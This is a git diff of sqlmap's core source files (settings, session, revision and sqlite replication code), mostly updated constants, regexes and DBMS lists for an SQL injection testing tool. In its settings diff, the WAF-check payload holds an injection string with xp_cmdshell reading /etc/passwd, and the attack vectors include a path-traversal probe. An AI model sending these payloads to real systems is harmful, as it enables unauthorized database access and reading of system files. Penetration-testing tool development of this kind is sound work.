class DataType: """ @@ -49,11 +57,16 @@ class Replication(object): self.name = unsafeSQLIdentificatorNaming(name) self.columns = columns if create: - self.execute('DROP TABLE IF EXISTS "%s"' % self.name) - if not typeless: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) - else: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + try: + self.execute('DROP TABLE IF EXISTS "%s"' % self.name) + if not typeless: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) + else: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + except Exception, ex: + errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING) + errMsg += "located at '%s'" % self.parent.dbpath + raise SqlmapGenericException(errMsg) def insert(self, values): """ @@ -70,7 +83,7 @@ class Replication(object): try: self.parent.cursor.execute(sql, parameters) except sqlite3.OperationalError, ex: - errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex) + errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath errMsg += "it's not used by some other program" raise SqlmapGenericException(errMsg) diff --git a/lib/core/revision.py b/lib/core/revision.py index 5319f1aa3..0c1682789 100644 --- a/lib/core/revision.py +++ b/lib/core/revision.py @@ -1,15 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re - -from subprocess import PIPE -from subprocess import Popen as execute +import subprocess def getRevisionNumber(): """ @@ -46,7 +44,7 @@ def getRevisionNumber(): break if not retVal: - process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) + process = subprocess.Popen("git rev-parse --verify HEAD", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, _ = process.communicate() match = re.search(r"(?i)[0-9a-f]{32}", stdout or "") retVal = match.group(0) if match else None diff --git a/lib/core/session.py b/lib/core/session.py index 68b4e13a4..574e3415e 100644 --- a/lib/core/session.py +++ b/lib/core/session.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -26,12 +26,14 @@ def setDbms(dbms): hashDBWrite(HASHDB_KEYS.DBMS, dbms) _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search("^%s" % _, dbms, re.I) + _ = re.search(r"\A%s( |\Z)" % _, dbms, re.I) if _: dbms = _.group(1) Backend.setDbms(dbms) + if kb.resolutionDbms: + hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms) logger.info("the back-end DBMS is %s" % Backend.getDbms()) diff --git a/lib/core/settings.py b/lib/core/settings.py old mode 100644 new mode 100755 index 325855514..f1773e695 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -1,26 +1,28 @@ 
#!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os +import random import re import subprocess import string import sys -import time +import types +from lib.core.datatype import AttribDict from lib.core.enums import DBMS from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS -from lib.core.revision import getRevisionNumber -# sqlmap version and site -VERSION = "1.0-dev" -REVISION = getRevisionNumber() -VERSION_STRING = "sqlmap/%s%s" % (VERSION, "-%s" % REVISION if REVISION else "-nongit-%s" % time.strftime("%Y%m%d", time.gmtime(os.path.getctime(__file__)))) +# sqlmap version (...) +VERSION = "1.1.7.3" +TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" +TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} +VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) DESCRIPTION = "automatic SQL injection and database takeover tool" SITE = "http://sqlmap.org" ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new" @@ -28,20 +30,25 @@ GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git" GIT_PAGE = "https://github.com/sqlmapproject/sqlmap" # colorful banner -BANNER = """\033[01;33m _ - ___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m -|_ -| . | | | .'| . | -|___|_ |_|_|_|_|__,| _| - |_| |_| \033[0m\033[4;37m%s\033[0m\n -""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE) +BANNER = """\033[01;33m\ + ___ + __H__ + ___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m +|_ -| . [.] | .'| . | +|___|_ [.]_|_|_|__,| _| + |_|V |_| \033[0m\033[4;37m%s\033[0m\n +""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE) # Minimum distance of ratio from kb.matchRatio to result in True DIFF_TOLERANCE = 0.05 CONSTANT_RATIO = 0.9 -# Ratio used in heuristic check for WAF/IDS/IPS protected targets +# Ratio used in heuristic check for WAF/IPS/IDS protected targets IDS_WAF_CHECK_RATIO = 0.5 +# Timeout used in heuristic check for WAF/IPS/IDS protected targets +IDS_WAF_CHECK_TIMEOUT = 10 + # Lower and upper values for match ratio in case of stable page LOWER_RATIO_BOUND = 0.02 UPPER_RATIO_BOUND = 0.98 @@ -55,11 +62,19 @@ PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__" URI_QUESTION_MARKER = "__QUESTION_MARK__" ASTERISK_MARKER = "__ASTERISK_MARK__" REPLACEMENT_MARKER = "__REPLACEMENT_MARK__" +BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__" + +RANDOM_INTEGER_MARKER = "[RANDINT]" +RANDOM_STRING_MARKER = "[RANDSTR]" +SLEEP_TIME_MARKER = "[SLEEPTIME]" PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__" CHAR_INFERENCE_MARK = "%c" PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]" +# Regular expression used for extraction of table names (useful for (e.g.) MsAccess) +SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? 
FROM (?P([\w.]|`[^`<>]+`)+)" + # Regular expression used for recognition of textual content-type TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)" @@ -69,17 +84,32 @@ PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied" # Regular expression used for recognition of generic maximum connection messages MAX_CONNECTIONS_REGEX = r"max.+connections" +# Maximum consecutive connection errors before asking the user if he wants to continue +MAX_CONSECUTIVE_CONNECTION_ERRORS = 15 + +# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it) +PRECONNECT_CANDIDATE_TIMEOUT = 10 + +# Maximum sleep time in "Murphy" (testing) mode +MAX_MURPHY_SLEEP_TIME = 3 + # Regular expression used for extracting results from Google search -GOOGLE_REGEX = r"url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" +GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)" # Regular expression used for extracting results from DuckDuckGo search DUCKDUCKGO_REGEX = r'"u":"([^"]+)' +# Regular expression used for extracting results from Disconnect Search +DISCONNECT_SEARCH_REGEX = r'
<p class="url wrapword">([^<]+)</p>
' + +# Dummy user agent for search (if default one returns different results) +DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0" + # Regular expression used for extracting content from "textual" tags TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P[^<]+)" # Regular expression used for recognition of IP addresses -IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" +IP_ADDRESS_REGEX = r"\b(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\b" # Regular expression used for recognition of generic "your ip has been blocked" messages BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)" @@ -107,7 +137,7 @@ UNION_STDEV_COEFF = 7 TIME_DELAY_CANDIDATES = 3 # Default value for HTTP Accept header -HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" +HTTP_ACCEPT_HEADER_VALUE = "*/*" # Default value for HTTP Accept-Encoding header HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" @@ -115,6 +145,9 @@ HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate" # Default timeout for running commands over backdoor BACKDOOR_RUN_CMD_TIMEOUT = 5 +# Number of seconds to wait for thread finalization at program end +THREAD_FINALIZATION_TIMEOUT = 1 + # Maximum number of techniques used in inject.py/getValue() per one value MAX_TECHNIQUES_PER_VALUE = 2 @@ -124,6 +157,9 @@ MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024 # Suffix used for naming meta databases in DBMS(es) without explicit database name METADB_SUFFIX = "_masterdb" +# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt) +PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3 + # Minimum time response set needed for time-comparison based on standard deviation MIN_TIME_RESPONSES = 30 @@ -172,26 +208,20 @@ PYVERSION = sys.version.split()[0] # DBMS system databases MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") -MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql" -PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast") -ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME +MYSQL_SYSTEM_DBS = ("information_schema", "mysql", "performance_schema") +PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast", "pgagent") +ORACLE_SYSTEM_DBS = ("ANONYMOUS", "APEX_PUBLIC_USER", "CTXSYS", "DBSNMP", "DIP", "EXFSYS", "FLOWS_%", "FLOWS_FILES", "LBACSYS", "MDDATA", "MDSYS", "MGMT_VIEW", "OLAPSYS", "ORACLE_OCM", "ORDDATA", "ORDPLUGINS", "ORDSYS", "OUTLN", "OWBSYS", "SI_INFORMTN_SCHEMA", "SPATIAL_CSW_ADMIN_USR", "SPATIAL_WFS_ADMIN_USR", "SYS", "SYSMAN", "SYSTEM", "WKPROXY", "WKSYS", "WK_TEST", "WMSYS", "XDB", "XS$NULL") # Reference: https://blog.vishalgupta.com/2011/06/19/predefined-oracle-system-schemas/ SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") -ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\ - "MSysAccessXML", "MSysModules", "MSysModules2") -FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\ - "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\ - 
"RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\ - "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\ - "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\ - "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") +ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage", "MSysAccessXML", "MSysModules", "MSysModules2") +FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE", "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS", "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES", "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS", "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS", "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN") SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") -DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\ - "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") +DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS", "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") +INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin") MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") -MYSQL_ALIASES = ("mysql", "my") +MYSQL_ALIASES = ("mysql", "my", "mariadb", "maria") PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") SQLITE_ALIASES = ("sqlite", "sqlite3") @@ -201,10 +231,11 @@ MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db") SYBASE_ALIASES = ("sybase", "sybase sql server") DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") +INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix") DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES +SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES SUPPORTED_OS = ("linux", "windows") DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES)) @@ -213,44 +244,46 @@ USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") REFERER_ALIASES = ("ref", "referer", "referrer") HOST_ALIASES = ("host",) +HSQLDB_DEFAULT_SCHEMA = "PUBLIC" + # Names 
that can't be used to name files on Windows OS WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") # Items displayed in basic help (-h) output BASIC_HELP_ITEMS = ( - "url", - "googleDork", - "data", - "cookie", - "randomAgent", - "proxy", - "testParameter", - "dbms", - "level", - "risk", - "tech", - "getAll", - "getBanner", - "getCurrentUser", - "getCurrentDb", - "getPasswordHashes", - "getTables", - "getColumns", - "getSchema", - "dumpTable", - "dumpAll", - "db", - "tbl", - "col", - "osShell", - "osPwn", - "batch", - "checkTor", - "flushSession", - "tor", - "sqlmapShell", - "wizard", - ) + "url", + "googleDork", + "data", + "cookie", + "randomAgent", + "proxy", + "testParameter", + "dbms", + "level", + "risk", + "tech", + "getAll", + "getBanner", + "getCurrentUser", + "getCurrentDb", + "getPasswordHashes", + "getTables", + "getColumns", + "getSchema", + "dumpTable", + "dumpAll", + "db", + "tbl", + "col", + "osShell", + "osPwn", + "batch", + "checkTor", + "flushSession", + "tor", + "sqlmapShell", + "wizard", +) # String representation for NULL value NULL = "NULL" @@ -261,13 +294,19 @@ BLANK = "" # String representation for current database CURRENT_DB = "CD" +# Regular expressions used for finding file paths in error messages +FILE_PATH_REGEXES = (r"(?P[^<>]+?) on line \d+", r"(?P[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P/\w[/\w.-]+)", r"href=['\"]file://(?P/[^'\"]+)") + # Regular expressions used for parsing error messages (--parse-errors) ERROR_PARSING_REGEXES = ( - r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", - r"(?m)^(fatal|error|warning|exception):?\s*(?P.+?)$", - r"
  • Error Type:
    (?P.+?)
  • ", - r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", - ) + r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", + r"(?m)^(fatal|error|warning|exception):?\s*(?P[^\n]+?)$", + r"(?P[^\n>]*SQL Syntax[^\n<]+)", + r"
  • Error Type:
    (?P.+?)
  • ", + r"CDbCommand (?P[^<>\n]*SQL[^<>\n]+)", + r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", + r"\[[^\n\]]+(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)" +) # Regular expression used for parsing charset info from meta html headers META_CHARSET_REGEX = r'(?si).*]+charset="?(?P[^"> ]+).*' @@ -305,6 +344,9 @@ URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z" # Regex used for masking sensitive data SENSITIVE_DATA_REGEX = "(\s|=)(?P[^\s=]*%s[^\s]*)\s" +# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the inside) +SENSITIVE_OPTIONS = ("hostname", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") + # Maximum number of threads (avoiding connection issues and/or DoS) MAX_NUMBER_OF_THREADS = 10 @@ -317,17 +359,20 @@ MIN_RATIO = 0.0 # Maximum value for comparison ratio MAX_RATIO = 1.0 +# Minimum length of sentence for automatic choosing of --string (in case of high matching ratio) +CANDIDATE_SENTENCE_MIN_LENGTH = 10 + # Character used for marking injectable position inside provided data CUSTOM_INJECTION_MARK_CHAR = '*' # Other way to declare injection position INJECT_HERE_MARK = '%INJECT HERE%' -# Maximum length used for retrieving data over MySQL error based payload due to "known" problems with longer result strings -MYSQL_ERROR_CHUNK_LENGTH = 50 +# Minimum chunk length used for retrieving data over error based payloads +MIN_ERROR_CHUNK_LENGTH = 8 -# Maximum length used for retrieving data over MSSQL error based payload due to trimming problems with longer result strings -MSSQL_ERROR_CHUNK_LENGTH = 100 +# Maximum chunk length used for retrieving data over error based payloads +MAX_ERROR_CHUNK_LENGTH = 1024 # Do not escape the injected statement if it contains any of the following SQL keywords EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK) @@ -341,6 +386,9 @@ REFLECTED_BORDER_REGEX = r"[^A-Za-z]+" # Regular expression used for replacing non-alphanum characters REFLECTED_REPLACEMENT_REGEX = r".+" +# Maximum time (in seconds) spent per reflective value(s) replacement +REFLECTED_REPLACEMENT_TIMEOUT = 3 + # Maximum number of alpha-numerical parts in reflected regex (for speed purposes) REFLECTED_MAX_REGEX_PARTS = 10 @@ -360,10 +408,10 @@ HASH_MOD_ITEM_DISPLAY = 11 MAX_INT = sys.maxint # Options that need to be restored in multiple targets run mode -RESTORE_MERGED_OPTIONS = ("col", "db", "dnsName", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user") +RESTORE_MERGED_OPTIONS = ("col", "db", "dnsDomain", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user") # Parameters to be ignored in detection phase (upper case) -IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN") +IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__VIEWSTATEGENERATOR", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN") # Regular expression used for recognition of ASP.NET control parameters ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$" @@ -386,13 +434,16 @@ CODECS_LIST_PAGE = 
"http://docs.python.org/library/codecs.html#standard-encoding # Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition) SQL_SCALAR_REGEX = r"\A(SELECT(?!\s+DISTINCT\(?))?\s*\w*\(" +# Option/switch values to ignore during configuration save +IGNORE_SAVE_OPTIONS = ("saveConfig",) + # IP address of the localhost LOCALHOST = "127.0.0.1" -# Default port used by Tor -DEFAULT_TOR_SOCKS_PORT = 9050 +# Default SOCKS ports used by Tor +DEFAULT_TOR_SOCKS_PORTS = (9050, 9150) -# Default ports used in Tor proxy bundles +# Default HTTP ports used by Tor DEFAULT_TOR_HTTP_PORTS = (8123, 8118) # Percentage below which comparison engine could have problems @@ -413,6 +464,8 @@ HTML_TITLE_REGEX = "(?P<result>[^<]+)" # Table used for Base64 conversion in WordPress hash cracking routine ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" +PICKLE_REDUCE_WHITELIST = (types.BooleanType, types.DictType, types.FloatType, types.IntType, types.ListType, types.LongType, types.NoneType, types.StringType, types.TupleType, types.UnicodeType, types.XRangeType, type(AttribDict()), type(set())) + # Chars used to quickly distinguish if the user provided tainted parameter values DUMMY_SQL_INJECTION_CHARS = ";()'" @@ -420,7 +473,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'" DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b" # Extensions skipped by crawler -CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx") +CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx") # Patterns often seen in HTTP headers containing custom injection marking character PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)" @@ -431,17 +484,26 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)" # 
Template used for common column existence check BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)" -# Payload used for checking of existence of IDS/WAF (dummier the better) -IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd" +# Payload used for checking of existence of IDS/IPS/WAF (dummier the better) +IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,NULL,'',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#" -# Vectors used for provoking specific WAF/IDS/IPS behavior(s) +# Data inside shellcodeexec to be filled with random string +SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" + +# Generic address for checking the Internet connection while using switch --check-internet +CHECK_INTERNET_ADDRESS = "http://ipinfo.io/" + +# Value to look for in response to CHECK_INTERNET_ADDRESS +CHECK_INTERNET_VALUE = "IP Address Details" + +# Vectors used for provoking specific WAF/IPS/IDS behavior(s) WAF_ATTACK_VECTORS = ( - "", # NIL - "search=", - "file=../../../../etc/passwd", - "q=foobar", - "id=1 %s" % IDS_WAF_CHECK_PAYLOAD - ) + "", # NIL + "search=", + "file=../../../../etc/passwd", + "q=foobar", + "id=1 %s" % IDS_WAF_CHECK_PAYLOAD +) # Used for status representation in dictionary attack phase ROTATING_CHARS = ('\\', '|', '|', '/', '-') @@ -449,29 +511,36 @@ ROTATING_CHARS = ('\\', '|', '|', '/', '-') # Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) BIGARRAY_CHUNK_SIZE = 1024 * 1024 +# Maximum number of socket pre-connects +SOCKET_PRE_CONNECT_QUEUE_SIZE = 3 + # Only console display last n table rows TRIM_STDOUT_DUMP_SIZE = 256 +# Reference: http://stackoverflow.com/a/3168436 +# Reference: https://support.microsoft.com/en-us/kb/899149 